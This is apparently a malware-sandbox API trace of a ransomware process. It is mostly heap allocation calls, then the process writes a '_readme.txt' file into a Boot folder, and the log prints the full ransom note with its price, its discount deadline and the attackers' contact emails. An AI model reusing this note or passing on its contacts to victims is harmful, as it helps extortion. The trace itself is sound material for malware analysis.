[0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.269] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0056.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.269] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.269] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.269] PathFindFileNameW (pszPath="") returned="" [0056.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.269] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.269] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.269] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.269] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.270] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0056.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.270] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0056.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.270] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or 